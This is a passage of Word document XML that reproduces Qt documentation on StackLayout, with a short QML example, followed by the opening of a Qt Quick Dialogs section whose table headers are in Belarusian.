                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> to most other layouts, child Items' </w:t>
            </w:r>
            <w:hyperlink r:id="rId1774" w:anchor="fillWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>Layout.fillWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:hyperlink r:id="rId1775" w:anchor="fillHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>Layout.fillHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> properties default to </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>. As a consequence, child items are by default filled to match the size of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1776" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>StackLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> as long as their </w:t>
            </w:r>
            <w:hyperlink r:id="rId1777" w:anchor="maximumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>Layout.maximumWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> or </w:t>
            </w:r>
            <w:hyperlink r:id="rId1778" w:anchor="maximumHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>Layout.maximumHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> does not prevent it.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Items are added to the layout by </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>reparenting the item to the layout</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">. Similarly, removal is done by </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>reparenting the item from the layout</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>. Both of these operations will affect the layout's </w:t>
            </w:r>
            <w:hyperlink r:id="rId1779" w:anchor="count-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>count</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> property.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>The following code will create a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1780" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>StackLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> where only the 'plum' rectangle is visible.</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4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>StackLayout</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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id: layout</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anchors.fill: parent</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currentIndex: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</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w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Rectangle</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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color: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>'teal'</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implicitWidth: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>200</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implicitHeight: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>200</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Rectangle</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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color: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>'plum'</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implicitWidth: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>300</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implicitHeight: </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>200</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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00863ED4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">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i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00863ED4" w:rsidP="00763692">
            <w:pPr>
              <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="29"/>
                <w:szCs w:val="29"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Items in a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1781" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
                </w:rPr>
                <w:t>StackLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> support these attached properties:…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD51DE" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1782" w:history="1">
        <w:r w:rsidR="00FD51DE" w:rsidRPr="008D56D4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquickdialogs-index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FD51DE" w:rsidRPr="00FD51DE" w:rsidRDefault="00FD51DE" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1412" w:name="_Toc483000833"/>
      <w:bookmarkStart w:id="1413" w:name="_Toc483003826"/>
      <w:bookmarkStart w:id="1414" w:name="_Toc483604179"/>
      <w:bookmarkStart w:id="1415" w:name="_Toc483605399"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Qt Quick Dialogs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1412"/>
      <w:bookmarkEnd w:id="1413"/>
      <w:bookmarkEnd w:id="1414"/>
      <w:bookmarkEnd w:id="1415"/>
    </w:p>
    <w:p w:rsidR="00FD51DE" w:rsidRPr="00FD51DE" w:rsidRDefault="00FD51DE" w:rsidP="00FD51DE">
      <w:pPr>
        <w:spacing w:after="360" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD51DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>The module is new in Qt 5.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD51DE" w:rsidRDefault="00FD51DE" w:rsidP="00FD51DE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1416" w:name="_Toc483000834"/>
      <w:bookmarkStart w:id="1417" w:name="_Toc483003827"/>
      <w:bookmarkStart w:id="1418" w:name="_Toc483604180"/>
      <w:bookmarkStart w:id="1419" w:name="_Toc483605400"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1416"/>
      <w:bookmarkEnd w:id="1417"/>
      <w:bookmarkEnd w:id="1418"/>
      <w:bookmarkEnd w:id="1419"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11483"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843"/>
        <w:gridCol w:w="8080"/>
      </w:tblGrid>
      <w:tr w:rsidR="00763692" w:rsidRPr="00763692" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Тып</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8080" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>апісанне</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00763692" w:rsidRPr="002230B8" w:rsidTr="008F1DE7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00FD51DE" w:rsidRPr="00763692" w:rsidRDefault="00FD51DE" w:rsidP="00763692">
